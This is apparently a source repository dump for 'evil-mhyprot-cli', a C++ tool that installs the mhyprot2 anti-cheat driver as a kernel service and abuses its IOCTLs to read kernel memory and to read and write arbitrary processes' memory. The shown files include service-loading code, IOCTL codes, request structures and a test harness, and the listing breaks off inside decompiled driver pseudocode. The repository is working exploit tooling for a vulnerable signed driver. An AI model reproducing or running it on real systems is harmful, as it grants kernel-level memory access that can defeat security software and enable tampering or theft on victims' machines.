├── image01.png
├── image02.png
├── image03.png
├── image04.png
├── image05.png
├── image06.png
├── image07.png
├── mhyprot.png
├── .gitmodules
├── src
    ├── file_utils.hpp
    ├── logger.hpp
    ├── file_utils.cpp
    ├── win_utils.hpp
    ├── service_utils.hpp
    ├── sup.hpp
    ├── evil-mhyprot-cli.filters
    ├── main.cpp
    ├── mhyprot.hpp
    ├── service_utils.cpp
    ├── win_utils.cpp
    ├── nt.hpp
    ├── evil-mhyprot-cli.vcxproj
    └── mhyprot.cpp
├── LICENSE
├── evil-mhyprot-cli.sln
├── IDA
    ├── FUN_0001d6e0.cpp
    ├── FUN_0001d000.cpp
    ├── sub_FFFFF800188CD6E0.txt
    └── sub_FFFFF800188CD000.txt
├── .gitignore
├── seedmap.txt
└── README.md


/image01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leeza007/evil-mhyprot-cli/HEAD/image01.png


--------------------------------------------------------------------------------
/image02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leeza007/evil-mhyprot-cli/HEAD/image02.png


--------------------------------------------------------------------------------
/image03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leeza007/evil-mhyprot-cli/HEAD/image03.png


--------------------------------------------------------------------------------
/image04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leeza007/evil-mhyprot-cli/HEAD/image04.png


--------------------------------------------------------------------------------
/image05.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leeza007/evil-mhyprot-cli/HEAD/image05.png


--------------------------------------------------------------------------------
/image06.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leeza007/evil-mhyprot-cli/HEAD/image06.png


--------------------------------------------------------------------------------
/image07.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leeza007/evil-mhyprot-cli/HEAD/image07.png


--------------------------------------------------------------------------------
/mhyprot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leeza007/evil-mhyprot-cli/HEAD/mhyprot.png


--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
1 | [submodule "libmhyprot"]
2 | 	path = libmhyprot
3 | 	url = https://github.com/kkent030315/libmhyprot.git
4 | 


--------------------------------------------------------------------------------
/src/file_utils.hpp:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include <Windows.h>
3 | #include <string>
4 | #include <fstream>
5 | 
6 | namespace file_utils
7 | {
8 | 	bool create_file_from_buffer(const std::string_view file_path, void* buffer, size_t size);
9 | }


--------------------------------------------------------------------------------
/src/logger.hpp:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <iostream>
 3 | 
 4 | #define LOG_ERROR() \
 5 | 	logger::log("[!] failed at in %s:%d, (0x%lX)\n", __FILE__, __LINE__, GetLastError())
 6 | 
 7 | namespace logger
 8 | {
 9 | 	template <typename ... T>
10 | 	__forceinline void log(const char* format, T const& ... args)
11 | 	{
12 | 		printf(format, args ...);
13 | 	}
14 | }


--------------------------------------------------------------------------------
/src/file_utils.cpp:
--------------------------------------------------------------------------------
 1 | #include "file_utils.hpp"
 2 | 
 3 | //
 4 | // create file from memory
 5 | //
 6 | bool file_utils::create_file_from_buffer(
 7 | 	const std::string_view file_path, void* buffer, size_t size
 8 | )
 9 | {
10 |     std::ofstream stream(
11 |         file_path.data(),
12 |         std::ios_base::out | std::ios_base::binary
13 |     );
14 | 
15 | 	if (!stream.write((char*)buffer, size))
16 | 	{
17 | 		stream.close();
18 | 		return false;
19 | 	}
20 | 
21 | 	stream.close();
22 | 	return true;
23 | }
24 | 


--------------------------------------------------------------------------------
/src/win_utils.hpp:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <Windows.h>
 3 | #include <string>
 4 | #include <memory>
 5 | #include <TlHelp32.h>
 6 | 
 7 | #include "logger.hpp"
 8 | #include "nt.hpp"
 9 | 
10 | #define CHECK_HANDLE(x) (x && x != INVALID_HANDLE_VALUE)
11 | #define MIN_ADDRESS ((ULONG_PTR)0x8000000000000000)
12 | 
13 | namespace win_utils
14 | {
15 | 	using unique_handle = std::unique_ptr<void, decltype(&CloseHandle)>;
16 | 
17 | 	uint32_t find_process_id(const std::string_view process_name);
18 | 	uint64_t find_base_address(const uint32_t process_id);
19 | 
20 | 	uint64_t obtain_sysmodule_address(const std::string_view target_module_name, bool debug_prints = false);
21 | }


--------------------------------------------------------------------------------
/src/service_utils.hpp:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <Windows.h>
 3 | #include <string>
 4 | 
 5 | #include "logger.hpp"
 6 | #include "win_utils.hpp"
 7 | #include "mhyprot.hpp"
 8 | 
 9 | #define CHECK_SC_MANAGER_HANDLE(x, ret_type)												\
10 | if (!CHECK_HANDLE(x))																		\
11 | {																							\
12 | 	logger::log("[!] failed to obtain service manager handle. (0x%lX)\n", GetLastError());	\
13 | 	return ret_type;																		\
14 | }																							\
15 | 
16 | namespace service_utils
17 | {
18 | 	SC_HANDLE open_sc_manager();
19 | 
20 | 	SC_HANDLE create_service(const std::string_view driver_path);
21 | 	bool delete_service(SC_HANDLE service_handle, bool close_on_fail = true, bool close_on_success = true);
22 | 
23 | 	bool start_service(SC_HANDLE service_handle);
24 | 	bool stop_service(SC_HANDLE service_handle);
25 | }


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2020 Kento Oki
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/src/sup.hpp:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <Windows.h>
 3 | 
 4 | #include "logger.hpp"
 5 | #include "win_utils.hpp"
 6 | #include "mhyprot.hpp"
 7 | 
 8 | namespace sup
 9 | {
10 | 	//
11 | 	// execute perform tests
12 | 	//
13 | 	__forceinline void perform_tests(const uint32_t process_id)
14 | 	{
15 | 		logger::log("\n[>] performing tests...\n");
16 | 
17 | 		//
18 | 		// read dos-header using winapi
19 | 		//
20 | 		const uint64_t process_base_address = win_utils::find_base_address(process_id);
21 | 
22 | 		logger::log("[+] module starts from: 0x%llX\n", process_base_address);
23 | 		logger::log("[>] reading dos/nt header using vulnerable driver...\n");
24 | 
25 | 		//
26 | 		// read dos-header using vulnerable driver
27 | 		//
28 | 		IMAGE_DOS_HEADER dos_header = mhyprot::driver_impl::
29 | 			read_user_memory<IMAGE_DOS_HEADER>(process_id, process_base_address);
30 | 
31 | 		//
32 | 		// read nt-header using vulnerable driver
33 | 		//
34 | 		IMAGE_NT_HEADERS nt_header = mhyprot::driver_impl::
35 | 			read_user_memory<IMAGE_NT_HEADERS>(process_id, process_base_address + dos_header.e_lfanew);
36 | 
37 | 		//
38 | 		// image size of target process
39 | 		//
40 | 		DWORD image_size = nt_header.OptionalHeader.SizeOfImage;
41 | 
42 | 		logger::log("[+] image size: 0x%lX\n", image_size);
43 | 		logger::log("[+] module ends at: 0x%llX\n", process_base_address + image_size);
44 | 
45 | 		if (dos_header.e_magic == IMAGE_DOS_SIGNATURE)
46 | 		{
47 | 			logger::log("[+] dos header signature is correct!\n");
48 | 		}
49 | 		else
50 | 		{
51 | 			logger::log("[+] incorrect dos header received\n");
52 | 		}
53 | 
54 | 		if (nt_header.Signature == IMAGE_NT_SIGNATURE)
55 | 		{
56 | 			logger::log("[+] nt header signature is correct!\n");
57 | 		}
58 | 		else
59 | 		{
60 | 			logger::log("[+] incorrect nt header received\n");
61 | 		}
62 | 
63 | 		logger::log("[<] performed\n");
64 | 	}
65 | }


--------------------------------------------------------------------------------
/evil-mhyprot-cli.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.30320.27
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "evil-mhyprot", "src\evil-mhyprot-cli.vcxproj", "{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Debug|x64.Build.0 = Debug|x64
18 | 		{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Debug|x86.Build.0 = Debug|Win32
20 | 		{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x64.ActiveCfg = Release|x64
21 | 		{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x64.Build.0 = Release|x64
22 | 		{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x86.ActiveCfg = Release|Win32
23 | 		{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x86.Build.0 = Release|Win32
24 | 		{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Debug|x64.ActiveCfg = Debug|x64
25 | 		{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Debug|x64.Build.0 = Debug|x64
26 | 		{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Debug|x86.ActiveCfg = Debug|Win32
27 | 		{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Debug|x86.Build.0 = Debug|Win32
28 | 		{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Release|x64.ActiveCfg = Release|x64
29 | 		{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Release|x64.Build.0 = Release|x64
30 | 		{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Release|x86.ActiveCfg = Release|Win32
31 | 		{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Release|x86.Build.0 = Release|Win32
32 | 	EndGlobalSection
33 | 	GlobalSection(SolutionProperties) = preSolution
34 | 		HideSolutionNode = FALSE
35 | 	EndGlobalSection
36 | 	GlobalSection(ExtensibilityGlobals) = postSolution
37 | 		SolutionGuid = {74DDB47F-DFB2-4765-B988-8088E5131DB1}
38 | 	EndGlobalSection
39 | EndGlobal
40 | 


--------------------------------------------------------------------------------
/src/evil-mhyprot-cli.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="main.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |     <ClCompile Include="win_utils.cpp">
22 |       <Filter>Source Files</Filter>
23 |     </ClCompile>
24 |     <ClCompile Include="mhyprot.cpp">
25 |       <Filter>Source Files</Filter>
26 |     </ClCompile>
27 |     <ClCompile Include="service_utils.cpp">
28 |       <Filter>Source Files</Filter>
29 |     </ClCompile>
30 |     <ClCompile Include="file_utils.cpp">
31 |       <Filter>Source Files</Filter>
32 |     </ClCompile>
33 |   </ItemGroup>
34 |   <ItemGroup>
35 |     <ClInclude Include="raw_driver.hpp">
36 |       <Filter>Header Files</Filter>
37 |     </ClInclude>
38 |     <ClInclude Include="logger.hpp">
39 |       <Filter>Header Files</Filter>
40 |     </ClInclude>
41 |     <ClInclude Include="win_utils.hpp">
42 |       <Filter>Header Files</Filter>
43 |     </ClInclude>
44 |     <ClInclude Include="mhyprot.hpp">
45 |       <Filter>Header Files</Filter>
46 |     </ClInclude>
47 |     <ClInclude Include="service_utils.hpp">
48 |       <Filter>Header Files</Filter>
49 |     </ClInclude>
50 |     <ClInclude Include="file_utils.hpp">
51 |       <Filter>Header Files</Filter>
52 |     </ClInclude>
53 |     <ClInclude Include="nt.hpp">
54 |       <Filter>Header Files</Filter>
55 |     </ClInclude>
56 |     <ClInclude Include="sup.hpp">
57 |       <Filter>Header Files</Filter>
58 |     </ClInclude>
59 |   </ItemGroup>
60 | </Project>


--------------------------------------------------------------------------------
/src/main.cpp:
--------------------------------------------------------------------------------
 1 | #include <iostream>
 2 | 
 3 | #include "logger.hpp"
 4 | #include "win_utils.hpp"
 5 | #include "mhyprot.hpp"
 6 | #include "sup.hpp"
 7 | 
 8 | #define CONTAINS(src, part) (src.find(part) != std::string::npos)
 9 | 
10 | #define PRINT_USAGE()                                           \
11 | logger::log("[-] incorrect usage\n");                           \
12 | logger::log("[+] usage: bin.exe [process name] [option]\n");    \
13 | logger::log("[+] example: bin.exe notepad.exe -t\n");           \
14 | logger::log("[+] options:\n");                                  \
15 | logger::log("  multiple options are available\n");              \
16 | logger::log("      t: test\n");                                 \
17 | logger::log("      d: debug prints\n");                         \
18 | logger::log("      s: print seeds\n");                          \
19 | 
20 | //
21 | // main entry point of this cli
22 | //
23 | int main(int argc, const char** argv)
24 | {
25 |     if (argc < 3)
26 |     {
27 |         PRINT_USAGE();
28 |         return -1;
29 |     }
30 | 
31 |     const std::string option(argv[2]);
32 | 
33 |     if (!CONTAINS(option, "-"))
34 |     {
35 |         PRINT_USAGE();
36 |         return -1;
37 |     }
38 | 
39 |     //
40 |     // find process id
41 |     //
42 |     const uint32_t process_id = win_utils::find_process_id(argv[1]);
43 | 
44 |     if (!process_id)
45 |     {
46 |         logger::log("[!] process \"%s\ was not found\n", argv[1]);
47 |         return -1;
48 |     }
49 | 
50 |     logger::log("[+] %s (%d)\n", argv[1], process_id);
51 | 
52 |     //
53 |     // initialize its service, etc
54 |     //
55 |     if (!mhyprot::init())
56 |     {
57 |         logger::log("[!] failed to initialize vulnerable driver\n");
58 |         return -1;
59 |     }
60 | 
61 |     //
62 |     // initialize driver implementations
63 |     //
64 |     if (!mhyprot::driver_impl::driver_init(
65 |         CONTAINS(option, "d"), // print debug
66 |         CONTAINS(option, "s")  // print seedmap
67 |     ))
68 |     {
69 |         logger::log("[!] failed to initialize driver properly\n");
70 |         mhyprot::unload();
71 |         return -1;
72 |     }
73 | 
74 |     //
75 |     // perform tests
76 |     //
77 |     if (CONTAINS(option, "t"))
78 |         sup::perform_tests(process_id);
79 | 
80 |     mhyprot::unload();
81 |     logger::log("[<] done!\n");
82 | 
83 |     return 0;
84 | }


--------------------------------------------------------------------------------
/src/mhyprot.hpp:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <Windows.h>
 3 | #include <fstream>
 4 | #include <filesystem>
 5 | 
 6 | #include "logger.hpp"
 7 | #include "raw_driver.hpp"
 8 | #include "file_utils.hpp"
 9 | #include "service_utils.hpp"
10 | 
11 | #define MHYPROT_SERVICE_NAME "mhyprot2"
12 | #define MHYPROT_DISPLAY_NAME "mhyprot2"
13 | #define MHYPROT_SYSFILE_NAME "mhyprot.sys"
14 | #define MHYPROT_SYSMODULE_NAME "mhyprot2.sys"
15 | 
16 | #define MHYPROT_DEVICE_NAME "\\\\?\\\\mhyprot2"
17 | 
18 | #define MHYPROT_IOCTL_INITIALIZE 		0x80034000
19 | #define MHYPROT_IOCTL_READ_KERNEL_MEMORY	0x83064000
20 | #define MHYPROT_IOCTL_READ_WRITE_USER_MEMORY	0x81074000
21 | 
22 | #define MHYPROT_ACTION_READ	0x0
23 | #define MHYPROT_ACTION_WRITE	0x1
24 | 
25 | #define MHYPROT_OFFSET_SEEDMAP 	0xA0E8
26 | 
27 | namespace mhyprot
28 | {
29 | 	typedef struct _MHYPROT_INITIALIZE
30 | 	{
31 | 		DWORD		_m_001;
32 | 		DWORD		_m_002;
33 | 		DWORD64		_m_003;
34 | 	} MHYPROT_INITIALIZE, *PMHYPROT_INITIALIZE;
35 | 
36 | 	typedef struct _MHYPROT_KERNEL_READ_REQUEST
37 | 	{
38 | 		union _HEADER
39 | 		{
40 | 			DWORD		result;
41 | 			DWORD64		address;
42 | 		} header;
43 | 		ULONG size;
44 | 	} MHYPROT_KERNEL_READ_REQUEST, *PMHYPROT_KERNEL_READ_REQUEST;
45 | 
46 | 	typedef struct _MHYPROT_USER_READ_WRITE_REQUEST
47 | 	{
48 | 		DWORD64 random_key;
49 | 		DWORD action;
50 | 		DWORD unknown_00;
51 | 		DWORD process_id;
52 | 		DWORD unknown_01;
53 | 		DWORD64 buffer;
54 | 		DWORD64 address;
55 | 		ULONG size;
56 | 		ULONG unknown_02;
57 | 	} MHYPROT_USER_READ_WRITE_REQUEST, *PMHYPROT_USER_READ_WRITE_REQUEST;
58 | 
59 | 	namespace detail
60 | 	{
61 | 		inline HANDLE device_handle;
62 | 		inline uint64_t seedmap[312];
63 | 		inline SC_HANDLE mhyplot_service_handle;
64 | 	}
65 | 
66 | 	bool init();
67 | 	void unload();
68 | 
69 | 	namespace driver_impl
70 | 	{
71 | 		bool request_ioctl(DWORD ioctl_code, LPVOID in_buffer, DWORD in_buffer_size);
72 | 		bool driver_init(bool debug_prints = false, bool print_seeds = false);
73 | 		uint64_t generate_key(uint64_t seed);
74 | 		void encrypt_payload(void* payload, size_t size);
75 | 
76 | 		bool read_kernel_memory(uint64_t address, void* buffer, size_t size);
77 | 		template<class T> __forceinline T read_kernel_memory(uint64_t address)
78 | 		{
79 | 			T buffer;
80 | 			read_kernel_memory(address, &buffer, sizeof(T));
81 | 			return buffer;
82 | 		}
83 | 
84 | 		bool read_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size);
85 | 		template<class T> __forceinline T read_user_memory(uint32_t process_id, uint64_t address)
86 | 		{
87 | 			T buffer;
88 | 			read_user_memory(process_id, address, &buffer, sizeof(T));
89 | 			return buffer;
90 | 		}
91 | 
92 | 		bool write_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size);
93 | 		template<class T> __forceinline bool write_user_memory(uint32_t process_id, uint64_t address, T value)
94 | 		{
95 | 			return write_user_memory(process_id, address, &value, sizeof(T));
96 | 		}
97 | 	}
98 | }
99 | 


--------------------------------------------------------------------------------
/src/service_utils.cpp:
--------------------------------------------------------------------------------
  1 | #include "service_utils.hpp"
  2 | 
  3 | //
  4 | // open service control manager to operate services
  5 | //
  6 | SC_HANDLE service_utils::open_sc_manager()
  7 | {
  8 |     return OpenSCManager(nullptr, nullptr, SC_MANAGER_CREATE_SERVICE);
  9 | }
 10 | 
 11 | //
 12 | // create a new service
 13 | // sc create myservice binPath="" type=kernel
 14 | //
 15 | SC_HANDLE service_utils::create_service(const std::string_view driver_path)
 16 | {
 17 |     SC_HANDLE sc_manager_handle = open_sc_manager();
 18 | 
 19 |     CHECK_SC_MANAGER_HANDLE(sc_manager_handle, (SC_HANDLE)INVALID_HANDLE_VALUE);
 20 | 
 21 |     SC_HANDLE mhyprot_service_handle = CreateService(
 22 |         sc_manager_handle,
 23 |         MHYPROT_SERVICE_NAME,
 24 |         MHYPROT_DISPLAY_NAME,
 25 |         SERVICE_START | SERVICE_STOP | DELETE,
 26 |         SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE,
 27 |         driver_path.data(), nullptr, nullptr, nullptr, nullptr, nullptr
 28 |     );
 29 | 
 30 |     if (!CHECK_HANDLE(mhyprot_service_handle))
 31 |     {
 32 |         const auto last_error = GetLastError();
 33 | 
 34 |         if (last_error == ERROR_SERVICE_EXISTS)
 35 |         {
 36 |             logger::log("[+] the service already exists, open handle\n");
 37 | 
 38 |             return OpenService(
 39 |                 sc_manager_handle,
 40 |                 MHYPROT_SERVICE_NAME,
 41 |                 SERVICE_START | SERVICE_STOP | DELETE
 42 |             );
 43 |         }
 44 | 
 45 |         logger::log("[!] failed to create %s service. (0x%lX)\n", MHYPROT_SERVICE_NAME, GetLastError());
 46 |         CloseServiceHandle(sc_manager_handle);
 47 |         return (SC_HANDLE)(INVALID_HANDLE_VALUE);
 48 |     }
 49 | 
 50 |     CloseServiceHandle(sc_manager_handle);
 51 | 
 52 |     return mhyprot_service_handle;
 53 | }
 54 | 
 55 | //
 56 | // delete the service
 57 | // sc delete myservice
 58 | //
 59 | bool service_utils::delete_service(SC_HANDLE service_handle, bool close_on_fail, bool close_on_success)
 60 | {
 61 |     SC_HANDLE sc_manager_handle = open_sc_manager();
 62 | 
 63 |     CHECK_SC_MANAGER_HANDLE(sc_manager_handle, false);
 64 | 
 65 |     if (!DeleteService(service_handle))
 66 |     {
 67 |         const auto last_error = GetLastError();
 68 | 
 69 |         if (last_error == ERROR_SERVICE_MARKED_FOR_DELETE)
 70 |         {
 71 |             CloseServiceHandle(sc_manager_handle);
 72 |             return true;
 73 |         }
 74 | 
 75 |         logger::log("[!] failed to delete the service. (0x%lX)\n", GetLastError());
 76 |         CloseServiceHandle(sc_manager_handle);
 77 |         if (close_on_fail) CloseServiceHandle(service_handle);
 78 |         return false;
 79 |     }
 80 | 
 81 |     CloseServiceHandle(sc_manager_handle);
 82 |     if (close_on_success) CloseServiceHandle(service_handle);
 83 | 
 84 |     return true;
 85 | }
 86 | 
 87 | //
 88 | // start the service
 89 | // sc start myservice
 90 | //
 91 | bool service_utils::start_service(SC_HANDLE service_handle)
 92 | {
 93 |     return StartService(service_handle, 0, nullptr);
 94 | }
 95 | 
 96 | //
 97 | // stop the service
 98 | // sc stop myservice
 99 | //
100 | bool service_utils::stop_service(SC_HANDLE service_handle)
101 | {
102 |     SC_HANDLE sc_manager_handle = open_sc_manager();
103 | 
104 |     CHECK_SC_MANAGER_HANDLE(sc_manager_handle, false);
105 | 
106 |     SERVICE_STATUS service_status;
107 | 
108 |     if (!ControlService(service_handle, SERVICE_CONTROL_STOP, &service_status))
109 |     {
110 |         logger::log("[!] failed to stop the service. (0x%lX)\n", GetLastError());
111 |         CloseServiceHandle(sc_manager_handle);
112 |         return false;
113 |     }
114 | 
115 |     CloseServiceHandle(sc_manager_handle);
116 | 
117 |     return true;
118 | }
119 | 


--------------------------------------------------------------------------------
/src/win_utils.cpp:
--------------------------------------------------------------------------------
  1 | #include "win_utils.hpp"
  2 | 
  3 | //
  4 | // find the process id by specific name using ToolHelp32Snapshot
  5 | //
  6 | uint32_t win_utils::find_process_id(const std::string_view process_name)
  7 | {
  8 | 	PROCESSENTRY32 processentry = {};
  9 | 
 10 | 	const unique_handle snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0), &CloseHandle);
 11 | 
 12 | 	if (!CHECK_HANDLE(snapshot.get()))
 13 | 	{
 14 | 		logger::log("[!] Failed to create ToolHelp32Snapshot [0x%lX]\n", GetLastError());
 15 | 		return 0;
 16 | 	}
 17 | 
 18 | 	processentry.dwSize = sizeof(MODULEENTRY32);
 19 | 
 20 | 	while (Process32Next(snapshot.get(), &processentry) == TRUE)
 21 | 	{
 22 | 		if (process_name.compare(processentry.szExeFile) == 0)
 23 | 		{
 24 | 			return processentry.th32ProcessID;
 25 | 		}
 26 | 	}
 27 | 
 28 | 	return 0;
 29 | }
 30 | 
 31 | //
 32 | // find the base address of process by the pid using ToolHelp32Snapshot
 33 | //
 34 | uint64_t win_utils::find_base_address(const uint32_t process_id)
 35 | {
 36 | 	MODULEENTRY32 module_entry = {};
 37 | 
 38 | 	const unique_handle snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, process_id), &CloseHandle);
 39 | 
 40 | 	if (!CHECK_HANDLE(snapshot.get()))
 41 | 	{
 42 | 		printf("[!] Failed to create ToolHelp32Snapshot [0x%lX]\n", GetLastError());
 43 | 		return 0;
 44 | 	}
 45 | 
 46 | 	module_entry.dwSize = sizeof(module_entry);
 47 | 
 48 | 	Module32First(snapshot.get(), &module_entry);
 49 | 
 50 | 	return (uint64_t)module_entry.modBaseAddr;
 51 | }
 52 | 
 53 | //
 54 | // lookup base address of specific module that loaded in the system
 55 | // by NtQuerySystemInformation api
 56 | //
 57 | uint64_t win_utils::obtain_sysmodule_address(
 58 | 	const std::string_view target_module_name,
 59 | 	bool debug_prints
 60 | )
 61 | {
 62 | 	const HMODULE module_handle = GetModuleHandle(TEXT("ntdll.dll"));
 63 | 
 64 | 	if (!CHECK_HANDLE(module_handle))
 65 | 	{
 66 | 		logger::log("[!] failed to obtain ntdll.dll handle. (0x%lX)\n", module_handle);
 67 | 		return 0;
 68 | 	}
 69 | 
 70 | 	pNtQuerySystemInformation NtQuerySystemInformation =
 71 | 		(pNtQuerySystemInformation)GetProcAddress(module_handle, "NtQuerySystemInformation");
 72 | 
 73 | 	if (!NtQuerySystemInformation)
 74 | 	{
 75 | 		logger::log("[!] failed to locate NtQuerySystemInformation. (0x%lX)\n", GetLastError());
 76 | 		return 0;
 77 | 	}
 78 | 
 79 | 	NTSTATUS status;
 80 | 	PVOID buffer;
 81 | 	ULONG alloc_size = 0x10000;
 82 | 	ULONG needed_size;
 83 | 
 84 | 	do
 85 | 	{
 86 | 		buffer = calloc(1, alloc_size);
 87 | 
 88 | 		if (!buffer)
 89 | 		{
 90 | 			logger::log("[!] failed to allocate buffer for query (0). (0x%lX)\n", GetLastError());
 91 | 			return 0;
 92 | 		}
 93 | 
 94 | 		status = NtQuerySystemInformation(
 95 | 			SystemModuleInformation,
 96 | 			buffer,
 97 | 			alloc_size,
 98 | 			&needed_size
 99 | 		);
100 | 
101 | 		if (!NT_SUCCESS(status) && status != STATUS_INFO_LENGTH_MISMATCH)
102 | 		{
103 | 			logger::log("[!] failed to query system module information. NTSTATUS: 0x%llX\n", status);
104 | 			free(buffer);
105 | 			return 0;
106 | 		}
107 | 
108 | 		if (status == STATUS_INFO_LENGTH_MISMATCH)
109 | 		{
110 | 			free(buffer);
111 | 			buffer = NULL;
112 | 			alloc_size *= 2;
113 | 		}
114 | 	} while (status == STATUS_INFO_LENGTH_MISMATCH);
115 | 
116 | 	if (!buffer)
117 | 	{
118 | 		logger::log("[!] failed to allocate buffer for query (1). (0x%lX)\n", GetLastError());
119 | 		return 0;
120 | 	}
121 | 
122 | 	PSYSTEM_MODULE_INFORMATION module_information = (PSYSTEM_MODULE_INFORMATION)buffer;
123 | 
124 | 	logger::log("[>] looking for %s in sysmodules...\n", target_module_name.data());
125 | 	
126 | 	for (ULONG i = 0; i < module_information->Count; i++)
127 | 	{
128 | 		SYSTEM_MODULE_INFORMATION_ENTRY module_entry = module_information->Module[i];
129 | 		ULONG_PTR module_address = (ULONG_PTR)module_entry.DllBase;
130 | 
131 | 		if (module_address < MIN_ADDRESS)
132 | 		{
133 | 			continue;
134 | 		}
135 | 
136 | 		PCHAR module_name = module_entry.ImageName + module_entry.ModuleNameOffset;
137 | 
138 | 		if (debug_prints)
139 | 		{
140 | 			logger::log("[+] sysmodule: %025s @ 0x%llX\n", module_name, module_address);
141 | 		}
142 | 
143 | 		if (target_module_name.compare(module_name) == 0 ||
144 | 			std::string(module_name).find("mhyprot") != std::string::npos)
145 | 		{
146 | 			logger::log("[<] found\n");
147 | 			return module_address;
148 | 		}
149 | 	}
150 | 
151 | 	free(buffer);
152 | 	return 0;
153 | }
154 | 


--------------------------------------------------------------------------------
/IDA/FUN_0001d6e0.cpp:
--------------------------------------------------------------------------------
  1 | 
  2 | /* WARNING: Globals starting with '_' overlap smaller symbols at the same address */
  3 | 
  4 | //
  5 | // Pseudocode
  6 | //
  7 | 
  8 | undefined8 IOCTL_FUN_0001d6e0(undefined8 param_1,longlong param_2)
  9 | {
 10 |   uint uVar1;
 11 |   uint uVar2;
 12 |   uint uVar3;
 13 |   ulonglong *puVar4;
 14 |   int iVar5;
 15 |   undefined8 uVar6;
 16 |   longlong lVar7;
 17 |   ulonglong uVar8;
 18 |   ulonglong *puVar9;
 19 |   ulonglong uVar10;
